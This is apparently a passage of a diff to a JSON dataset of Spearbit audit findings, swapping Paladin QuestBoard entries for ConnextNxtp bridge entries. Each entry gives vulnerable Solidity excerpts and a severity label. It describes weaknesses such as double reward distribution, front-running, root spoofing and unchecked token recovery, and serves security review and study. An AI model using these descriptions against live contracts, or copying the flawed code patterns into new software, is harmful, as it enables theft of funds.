closePartOfQuestPeriod(), but closeQuest- Period() continues to work. It will close the second quest again and send the rewards of the second quest to the distributor, again. Also, function closeQuestPeriod() sets the withdrawableAmount value one more time, so the creator can do withdrawUnusedRewards() once more. Although both closeQuestPeriod() and closePartOfQuestPeriod() are authorized, the problems above could occur by accident. Additionally there is a lot of code duplication between closeQuestPeriod() and closePartOfQuestPeriod(), with a high risk of issues with future code changes. 5 function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant { ... // We use the 1st QuestPeriod of this period to check it was not Closed uint256[] memory questsForPeriod = questsByPeriod[period]; require( ,! periodsByQuest[questsForPeriod[0]][period].currentState == PeriodState.ACTIVE, // only checks first period \"QuestBoard: Period already closed\" ); ... // no further checks on currentState _questPeriod.withdrawableAmount = .... IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // sends tokens (again) ... } // sets withdrawableAmount (again) function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive onlyAllowed nonReentrant { ,! ... _questPeriod.currentState = PeriodState.CLOSED; ... _questPeriod.withdrawableAmount = _questPeriod.rewardAmountPerPeriod - toDistributeAmount; IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); ... } Note: Set to high risk because the likelihood of this happening is medium, but the impact is high.", + "title": "Message can be delivered out of order", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Messages can be delivered out of order on the spoke. Anyone can call the permissionless prove- AndProcess to process the messages in any order they want. A malicious user can force the spoke to process messages in a way that is beneficial to them (e.g., front-run).", "labels": [ "Spearbit", - "Paladin", - "Severity: High Risk" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Limit possibilities of recoverERC20()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Function recoverERC20() in contract MultiMerkleDistributor.sol allows the retrieval of all ERC20 tokens from the MultiMerkleDistributor.sol whereas the comment indicates it is only meant to retrieve those tokens that have been sent by mistake. Allowing to retrieve all tokens also enables the retrieval of legitimate ones. This way rewards cannot be collected anymore. It could be seen as allowing a rug pull by the project and should be avoided. In contrast, function recoverERC20() in contract QuestBoard.sol does prevent whitelisted tokens from being re- trieved. Note: The project could also add a merkle tree that allows for the retrieval of legitimate tokens to their own addresses. 6 * @notice Recovers ERC2O tokens sent by mistake to the contract contract MultiMerkleDistributor is Ownable { function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { IERC20(token).safeTransfer(owner(), amount); return true; } } contract QuestBoard is Ownable, ReentrancyGuard { function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { require(!whitelistedTokens[token], \"QuestBoard: Cannot recover whitelisted token\"); IERC20(token).safeTransfer(owner(), amount); return true; } }", + "title": "Extra checks in _verifySender() of GnosisBase", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "According to the Gnosis bridge documentation the source chain id should also be checked using messageSourceChainId(). This is because in the future the same arbitrary message bridge contract could handle requests from different chains. If a malicious actor would be able to have access to the contract at mirrorConnector on a to-be-supported chain that is not the MIRROR_DOMAIN, they can send an arbitrary root to this mainnet/L1 hub connector which the con- nector would mark it as coming from the MIRROR_DOMAIN. So the attacker can spoof/forge function calls and asset transfers by creating a payload root and using this along with their access to mirrorConnector on chain to send a cross-chain processMessage to the Gnosis hub connector and after they can use their payload root and proofs to forge/spoof transfers on the L1 chain. Although it is unlikely that any other party could add a contract with the same address as _amb on another chain, it is safer to add additional checks. function _verifySender(address _amb, address _expected) internal view returns (bool) { require(msg.sender == _amb, \"!bridge\"); return GnosisAmb(_amb).messageSender() == _expected; } 28", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Medium Risk" ] }, { - "title": "Updating QuestBoard in MultiMerkleDistributor.sol will not work", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Updating QuestManager/ QuestBoard in MultiMerkleDistributor.sol will give the following issue: If the newQuestBoard uses the current implementation of QuestBoard.sol, it will start with questId == 0 again, thus attempting to overwrite previous quests. function updateQuestManager(address newQuestBoard) external onlyOwner { questBoard = newQuestBoard; }", + "title": "Absence of Minimum delayBlocks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Owner can accidentally set delayBlocks as 0 (or a very small delay block) which will collapse the whole fraud protection mechanism. Since there is no check for minimum delay before setting a new delay value so even a low value will be accepted by setDelayBlocks function function setDelayBlocks(uint256 _delayBlocks) public onlyOwner { require(_delayBlocks != delayBlocks, \"!delayBlocks\"); emit DelayBlocksUpdated(_delayBlocks, delayBlocks); delayBlocks = _delayBlocks; }", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Medium Risk" ] }, { - "title": "Old quests can be extended via increaseQuestDuration()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Function increaseQuestDuration() does not check if a quest is already in the past. Extending a quest from the past in duration is probably not useful. It also might require additional calls to closePartOfQuest- Period(). function increaseQuestDuration(...) ... { updatePeriod(); ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... uint256 periodIterator = ((lastPeriod + WEEK) / WEEK) * WEEK; ... for(uint256 i = 0; i < addedDuration;){ ... periodsByQuest[questID][periodIterator]....= ... periodIterator = ((periodIterator + WEEK) / WEEK) * WEEK; unchecked{ ++i; } } ... }", + "title": "Add extra 0 checks in verifyAggregateRoot() and proveMessageRoot()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The functions verifyAggregateRoot() and proveMessageRoot() verify and confirm roots. A root value of 0 is a special case. If this value would be allowed, then the functions could allow invalid roots to be passed. Currently the functions verifyAggregateRoot() and proveMessageRoot() don't explicitly verify the roots are not 0. 29 function verifyAggregateRoot(bytes32 _aggregateRoot) internal { if (provenAggregateRoots[_aggregateRoot]) { return; } ... // do several verifications provenAggregateRoots[_aggregateRoot] = true; ... } function proveMessageRoot(...) ... { if (provenMessageRoots[_messageRoot]) { return; } ... // do several verifications provenMessageRoots[_messageRoot] = true; }", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Medium Risk" ] }, { - "title": "Accidental call of addQuest could block contracts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The addQuest() function uses an onlyAllowed access control modifier. This modifier checks if msg.sender is questBoard or owner. However, the QuestBoard.sol contract has a QuestID registration and a token whitelisting mechanism which should be used in combination with addQuest() function. If owner accidentally calls addQuest(), the QuestBoard.sol contract will not be able to call addQuest() for that questID. As soon as createQuest() tries to add that same questID the function will revert, becoming uncallable because nextID still maintains that same value. function createQuest(...) ... { ... uint256 newQuestID = nextID; nextID += 1; ... require(MultiMerkleDistributor(distributor).addQuest(newQuestID, rewardToken), \"QuestBoard: Fail add to Distributor\"); ... ,! } 8 function addQuest(uint256 questID, address token) external onlyAllowed returns(bool) { require(questRewardToken[questID] == address(0), \"MultiMerkle: Quest already listed\"); require(token != address(0), \"MultiMerkle: Incorrect reward token\"); // Add a new Quest using the QuestID, and list the reward token for that Quest questRewardToken[questID] = token; emit NewQuest(questID, token); return true; } Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.", + "title": "_removeAssetId() should also clear custodied", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In one of the fixes in PR 2530, _removeAssetId() doesn't clear custodied as it is assumed to be 0. function _removeAssetId(...) ... { // NOTE: custodied will always be 0 at this point } However custodied isn't always 0. Suppose cap & custodied have a value (!=0), then _setLiquidityCap() is called to set the cap to 0. The function doesn't reset the custodied value so it will stay at !=0.", "labels": [ "Spearbit", - "Paladin", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Reduce impact of emergencyUpdatequestPeriod()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Function emergencyUpdatequestPeriod() allows the merkle tree to be updated. The merkle tree contains an embedded index parameter which is used to prevent double claims. When the merkleRoot is updated, the layout of indexes in the merkle tree could become different. Example: Suppose the initial merkle tree contains information for: - user A: index=1, account = 0x1234, amount=100 - user B: index=2, account = 0x5689, amount=200 Then user A claims => _setClaimed(..., 1) is set. Now it turns out a mistake is made with the merkle tree, and it should contain: - user B: index=1, account = 0x5689, amount=200 - user C: index=2, account = 0xabcd, amount=300 Now user B will not be able to claim because bit 1 has already been set. Under this situation the following issues can occur: Someone who has already claimed might be able to claim again. Someone who has already claimed has too much. Someone who has already claimed has too little, and cannot longer claim the rest because _setClaimed() has already been set. someone who has not yet claimed might not be able to claim because _setClaimed() has already been set by another user. Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.", + "title": "Remove liquidity while paused", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function removeLiquidity() in StableSwapFacet.sol has a whenNotPaused modifier, while the comment shows Liquidity can always be removed, even when the pool is paused.. On the other hand function removeLiquidity() in StableSwap.sol doesn't have this modifier. StableSwapFacet.sol#L394-L446 // Liquidity can always be removed, even when the pool is paused. function removeLiquidity(...) external ... nonReentrant whenNotPaused ... { ... } function removeLiquidityOneToken(...) external ... nonReentrant whenNotPaused function removeLiquidityImbalance(...) external ... nonReentrant whenNotPaused ... { ... } ... { ... } StableSwap.sol#L394-L446 // Liquidity can always be removed, even when the pool is paused. function removeLiquidity(...) external ... nonReentrant ... { ... } function removeLiquidityOneToken(...) external ... nonReentrant whenNotPaused function removeLiquidityImbalance(...) external ... nonReentrant whenNotPaused ... { ... } ... { ... }", "labels": [ "Spearbit", - "Paladin", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Verify the correct merkle tree is used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The MultiMerkleDistributor.sol contract does not verify that the merkle tree belongs to the right quest and period. If the wrong merkle tree is added then the wrong rewards can be claimed. Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.", + "title": "Relayers can frontrun each other's calls to BridgeFacet.execute", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Relayers can front run each other's calls to BridgeFacet.execute. Currently, there is no on-chain mechanism to track how many fees should be allocated to each relayer. All the transfer bump fees are funneled into one address s.relayerFeeVault.", "labels": [ "Spearbit", - "Paladin", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Prevent mixing rewards from different quests and periods", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The MultiMerkleDistributor.sol contract does not verify that the sum of all amounts in the merkle tree are equal to the rewards allocated for that quest and for that period. This could happen if there is a bug in the merkle tree creation script. If the sum of the amounts is too high, then tokens from other quests or other periods could be claimed, which will give problems later on, when claims are done for the other quest/periods. Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.", + "title": "OptimismHubConnector.processMessageFromRoot emits MessageProcessed for already processed messages", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Calls to processMessageFromRoot with an already processed _data still emit MessageProcessed. This might cause issues for off-chain agents like relayers monitoring this event.", "labels": [ "Spearbit", - "Paladin", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Nonexistent zero address check for newQuestBoard in updateQuestManager function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Nonexistent zero address check for newQuestBoard in updateQuestManager function. Assigning newQuestBoard to a zero address may cause unintended behavior.", + "title": "Add max cap for domains", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Currently there isn't any cap on the maximum amount of domains which system can support. If the size of the domains and connectors grow, at some point due to out-of-gas errors in updateHashes function, both addDomain and removeDomain could DOS.", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "Verify period is always a multiple of week", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The calculations with period assume that period is a multiple of WEEK. However, period is often assigned as a parameter and not verified if it is a multiple of WEEK. This calculation may cause unexpected results. Note: When it is verified that period is a multiple of WEEK, the following calculation can be simplified: - int256 nextPeriod = ((period + WEEK) / WEEK) * WEEK; + int256 nextPeriod = period + WEEK; The following function does not explicitly verify that period is a multiple of WEEK. function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant { ... uint256 nextPeriod = ((period + WEEK) / WEEK) * WEEK; ... } function getQuestIdsForPeriod(uint256 period) external view returns(uint256[] memory) { ... } function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) ... { ... } function addMerkleRoot(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... } function addMultipleMerkleRoot(..., uint256 period, ...) external isAlive onlyAllowed nonReentrant { ... } ,! function claim(..., uint256 period, ...) public { ... } function updateQuestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... } function emergencyUpdatequestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... } function claimQuest(address account, uint256 questID, ClaimParams[] calldata claims) external { ,! ... // also uses period as part of the claims array require(questMerkleRootPerPeriod[claims[i].questID][claims[i].period] != 0, \"MultiMerkle: not updated yet\"); require(!isClaimed(questID, claims[i].period, claims[i].index), \"MultiMerkle: already claimed\"); ... require( MerkleProof.verify(claims[i].merkleProof, questMerkleRootPerPeriod[questID][claims[i].period], ,! node), \"MultiMerkle: Invalid proof\" ); ... _setClaimed(questID, claims[i].period, claims[i].index); ... emit Claimed(questID, claims[i].period, claims[i].index, claims[i].amount, rewardToken, account); ... }", + "title": "In certain scenarios calls to xcall... or addRouterLiquidity... can be DoSed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The owner or an admin can frontrun (or it can be by an accident) a call that: A router has made on a canonical domain of a canonical token to supply that token as liquidity OR A user has made to xcall... supplying a canonical token on its canonical domain. The frontrunning call would set the cap to a low number (calling updateLiquidityCap). This would cause the calls mentioned in the bullet list to fail due to the checks against IERC20(_local).balanceOf(address(this)).", "labels": [ "Spearbit", - "Paladin", - "Severity: Low Risk QuestBoard.sol#L201-L203, QuestBoard.sol#L750-L815," + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Missing safety check to ensure array length does not underflow and revert", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Several functions use questPeriods[questID][questPeriods[questID].length - 1]. The sec- ond value in the questPeriods mapping is questPeriods[questID].length - 1. It is possible for this function to revert if the case arises where questPeriods[questID].length is 0. Looking at the code this is not likely to occur but it is a valid safety check that covers possible strange edge cases. function _getRemainingDuration(uint256 questID) internal view returns(uint256) { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... } function increaseQuestDuration(...) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... } function increaseQuestReward(...) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... } function increaseQuestObjective(... ) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... }", + "title": "Missing a check against address(0) in ConnextPriceOracle's constructor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "When ConnextPriceOracle is deployed an address _wrapped is passed to its constructor. The current codebase does not check whether the passed _wrapped can be an address(0) or not.", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "Prevent dual entry point tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Function recoverERC20() in contract QuestBoard.sol only allows the retrieval of non whitelisted tokens. Recently an issue has been found to circumvent these checks, with so called dual entry point tokens. See a description here: compound-tusd-integration-issue-retrospective function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { require(!whitelistedTokens[token], \"QuestBoard: Cannot recover whitelisted token\"); IERC20(token).safeTransfer(owner(), amount); return true; } 13", + "title": "_executeCalldata() can revert if insufficient gas is supplied", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function _executeCalldata() contains the statement gasleft() - 10_000. This statement can revert if the available gas is less than 10_000. Perhaps this is the expected behaviour. Note: From the Tangerine Whistle fork only a maximum 63/64 of the available gas is sent to contract being called. Therefore, 1/64th is left for the calling contract. function _executeCalldata(...) ... { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(_params.to, gasleft() - 10_000, ... ); ... ,! }", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "Limit the creation of quests", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The function getQuestIdsForPeriod() could run out of gas if someone creates an enormous amount of quests. See also: what-is-the-array-size-limit-of-a-returned-array. Note: If this were to happen, the QuestIds can also be retrieved directly from the getter of questsByPeriod(). Note: closeQuestPeriod() has the same problem, but closePartOfQuestPeriod() is a workaround for this. Requiring a minimal amount of tokens to create a quest can limit the number of quests. The minimum number of tokens to pay is: duration * minObjective * minRewardPerVotePerToken[]. The values of duration and minObjective are least 1, but minRewardPerVotePerToken[] could be 0 and even if minRewardPerVotePerToken is non zero but still low, the number of tokes required is neglectable when using tokens with 18 decimals. Requiring a minimum amount of tokens also helps to prevent the creation of spam quests. 14 function getQuestIdsForPeriod(uint256 period) external view returns(uint256[] memory) { return questsByPeriod[period]; // could run out of gas } function createQuest(...) { ... require(duration > 0, \"QuestBoard: Incorrect duration\"); require(objective >= minObjective, \"QuestBoard: Objective too low\"); ... require(rewardPerVote >= minRewardPerVotePerToken[rewardToken], \"QuestBoard: RewardPerVote too low\"); ... vars.rewardPerPeriod = (objective * rewardPerVote) / UNIT; // can be 0 ==> totalRewardAmount can be 0 require((totalRewardAmount * platformFee)/MAX_BPS == feeAmount, \"QuestBoard: feeAmount incorrect\"); // feeAmount can be 0 ... require((vars.rewardPerPeriod * duration) == totalRewardAmount, \"QuestBoard: totalRewardAmount incorrect\"); ... IERC20(rewardToken).safeTransferFrom(vars.creator, address(this), totalRewardAmount); IERC20(rewardToken).safeTransferFrom(vars.creator, questChest, feeAmount); ... ,! ,! ,! ,! } constructor(address _gaugeController, address _chest){ ... minObjective = 1000 * UNIT; // initial value, but can be overwritten ... } function updateMinObjective(uint256 newMinObjective) external onlyOwner { require(newMinObjective > 0, \"QuestBoard: Null value\"); // perhaps set higher minObjective = newMinObjective; } function whitelistToken(address newToken, uint256 minRewardPerVote) public onlyAllowed { // geen isAlive??? ... minRewardPerVotePerToken[newToken] = minRewardPerVote; // no minimum value required ... ,! }", + "title": "Be aware of precompiles", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The external calls by _executeCalldata() could call a precompile. Different chains have creative precompile implementations, so this could in theory pose problems. For example precompile 4 copies memory: what-s-the-identity-0x4-precompile Note: precompiles link to dedicated pieces of code written in Rust or Go that can be called from the EVM. Here are a few links for documentation on different chains: moonbeam precompiles, astar precompiles function _executeCalldata(...) ... { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _params.to, ...); } else { returnData = IXReceiver(_params.to).xReceive(...); } ... }", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "Non existing states are considered active", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "periods- if a state is checked of a non existing However, ByQuest[questIDs[i]][period] is active. questIDs[i] or a questID that has no quest in that period, then periodsByQuest[questIDs[i]][period] is empty and periodsByQuest[questIDs[i]][period].currentState == 0. closePartOfQuestPeriod() function verifies state the of if As PeriodState.ACTIVE ==0, the stated is considered to be active and the require() doesnt trigger and pro- cessing continues. Luckily as all other values are also 0 (especially _questPeriod.rewardAmountPerPeriod), toDistributeAmount will be 0 and no tokens are sent. However slight future changes in the code might introduce unwanted effects. enum PeriodState { ACTIVE, CLOSED, DISTRIBUTED } // ACTIVE == 0 function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive ,! onlyAllowed nonReentrant { ... for(uint256 i = 0; i < length;){ ... require( periodsByQuest[questIDs[i]][period].currentState == PeriodState.ACTIVE, // doesn't work ,! if questIDs[i] & period are empty \"QuestBoard: Period already closed\" );", + "title": "Upgrade to solidity 0.8.17", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Solidity 0.8.17 released a bugfix where the optimizer could incorrectly remove storage writes if the code fit a certain pattern (see this security alert). This bug was introduced in 0.8.13. Since Connext is using the legacy code generation pipeline, i.e., compiling without the via-IR flag, the current code is not at risk. This is because assembly blocks dont write to storage. However, if this changes and Connext compiles through via-IR code generation, the code is more likely to be affected. One reason to use this code generation pipeline could be to enable gas optimizations not available in legacy code generation.", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "Critical changes should use two-step process", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The QuestBoard.sol, QuestTreasureChest.sol and QuestTreasureChest.sol contracts inherit from OpenZeppelins Ownable contract which enables the onlyOwner role to transfer ownership to another address. Its possible that the onlyOwner role mistakenly transfers ownership to the wrong address, resulting in a loss of the onlyOwner role. This is an unwanted situation because the owner role is neccesary for several methods.", + "title": "Add domain check in setupAssetWithDeployedRepresentation()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function setupAssetWithDeployedRepresentation() links a new _representation asset. However this should not be done on the canonical domain. So good to check this to prevent potential mistakes. function setupAssetWithDeployedRepresentation(...) ... { bytes32 key = _enrollAdoptedAndLocalAssets(_adoptedAssetId, _representation, _stableSwapPool, _canonical); ... ,! }", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "Prevent accidental call of emergencyUpdatequestPeriod()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Functions updateQuestPeriod() and emergencyUpdatequestPeriod() are very similar. However, if function emergencyUpdatequestPeriod() is accidentally used instead of updateQuestPeriod(), then period isnt push()ed to the array questClosedPeriods[]. This means function getClosedPeriodsByQuests() will not be able to retreive all the closed periods. function updateQuestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) external onlyAllowed returns(bool) { ... questClosedPeriods[questID].push(period); ... questMerkleRootPerPeriod[questID][period] = merkleRoot; ... ,! } function emergencyUpdatequestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) external onlyOwner returns(bool) { ... // no push() questMerkleRootPerPeriod[questID][period] = merkleRoot; ... ,! }", + "title": "If an adopted token and its canonical live on the same domain the cap for the custodied amount is applied for each of those tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "If _local is an adopted asset that lives on its canonical's original chain, then we are comparing the to-be-updated balance of this contract (custodied) with s.caps[key]. That means we are also comparing the balance of an adopted asset with the property above with the cap. For example, if A is the canonical token and B the adopted, then cap = s.caps[key] is used to cap the custodied amount in this contract for both of those tokens. So if the cap is 1000, the contract can have a balance of 1000 A and 1000 B, which is twice the amount meant to be capped. This is true basically for any approved asset with the above properties. When the owner or the admin calls setu- pAsset: // File: https://github.com/connext/nxtp/blob/32a0370edc917cc45c231565591740ff274b5c05/packages/deploym ents/contracts/contracts/core/connext/facets/TokenFacet.sol#L164-L172 ,! function setupAsset( c TokenId calldata _canonical, uint8 _canonicalDecimals, string memory _representationName, string memory _representationSymbol, address _adoptedAssetId, address _stableSwapPool, uint256 _cap ) external onlyOwnerOrAdmin returns (address _local) { such that _canonical.domain == s.domain and _adoptedAssetId != 0, then this asset has the property in ques- tion.", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "Usage of deprecated safeApprove", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "OpenZeppelin safeApprove implementation is deprecated. Reference. Using this deprecated func- tion can lead to unintended reverts and potential locking of funds. SafeERC20.safeApprove() Insecure Behaviour.", + "title": "There are no checks/constraints against the _representation provided to setupAssetWithDe- ployedRepresentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "setupAssetWithDeployedRepresentation is similar to setupAsset in terms of functionality, except it does not deploy a representation token if necessary. It actually uses the _representation address given as the representation token. The _representation parameter given does not have any checks in terms of functionality compared to when setupAsset which deploys a new BridgeToken instance: // File: packages\\deployments\\contracts\\contracts\\core\\connext\\facets\\TokenFacet.sol#L399 _token = address(new BridgeToken(_decimals, _name, _symbol)); Basically, representation needs to implement IBridgeToken (mint, burn, setDetails, ... ) and some sort of IERC20. Otherwise, if a function from IBridgeToken is not implemented or if it does not have IERC20 functionality, it can cause failure/reverts in some functions in this codebase. Another thing that is important is that the decimals for _representation should be equal to the decimals precision of the canonical token. And that _representation should not be able to update/change its decimals. Also, this opens an opportunity for a bad owner or admin to provide a malicious _representation to this function. This does not have to be a malicious act, it can also happen by mistake from for example an admin. Additionally the Connext Diamond must have the \"right\" to mint() and burn() the tokens.", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "questID on the NewQuest event should be indexed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The NewQuest event currently does not have questID set to indexed which goes against the pattern set by the other events in the contract where questID is actually indexed.", + "title": "In dequeueVerified when no verified items are found in the queue last == first - 1", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The comment in dequeueVerified mentions that when no verified items are found in the queue, then last == first. But this is not true since the loop condition is last >= first and the loop only terminates (not considering the break) when last == first - 1. It is important to correct this incorrect statement in the comment, since a dev/user can by mistake take this state- ment as true and modify/use the code with this incorrect assumption in mind.", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "Add validation checks on addresses", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Missing validation checks on addresses passed into the constructor functions. Adding these checks on _gaugeController and _chest can prevent costly errors the during deployment of the contract. Also in function claim() and claimQuest() there is no zero check for for account argument.", + "title": "Dirty bytes in _loc and _len can override other values when packing a typed memory view in unsafeBuildUnchecked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "For a TypeedMemView, the location and the length are supposed to occupy 12 bytes (uint96), but the type used for these values for the input parameters for unsafeBuildUnchecked is uint256. This would allow those values to carry dirty bytes and when the following calculations are performed: newView := shl(96, or(newView, _type)) // insert type newView := shl(96, or(newView, _loc)) // insert loc newView := shl(24, or(newView, _len)) // empty bottom 3 bytes _loc can potentially manipulate the type section of the view and _len can potentially manipulate both the _loc and the _type section.", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "Changing public constant variables to non-public can save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Several constants are public and thus have a getter function. called from the outside, therefore it is not necessary to make them public. It is unlikely for these values to be", + "title": "To use sha2, hash160 and hash256 of TypedMemView the hard-coded precompile addresses would need to be checked to make sure they return the corresponding hash values.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "sha2, hash160 and hash256 assume that the precompile contracts at address(2) and address(3) calculate and return the sha256 and ripemd160 hashes of the provided memory chunks. These assumptions depend on the chain that the project is going to be deployed on.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Using uint instead of bool to optimize gas usage", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "A bool is more costly than uint256. Because each write action generates an additional SLOAD to read the contents of the slot, change the bits occupied by bool and finally write back. contract BooleanTest { mapping(address => bool) approvedManagers; // Gas Cost : 44144 function approveManager(address newManager) external{ approvedManagers[newManager] = true; } mapping(address => uint256) approvedManagersWithoutBoolean; // Gas Cost : 44069 function approveManagerWithoutBoolean(address newManager) external{ approvedManagersWithoutBoolean[newManager] = 1; } }", + "title": "sha2, hash160 and hash256 of TypedMemView.sha2 do not clear the memory after calculating the hash", + "html_url": 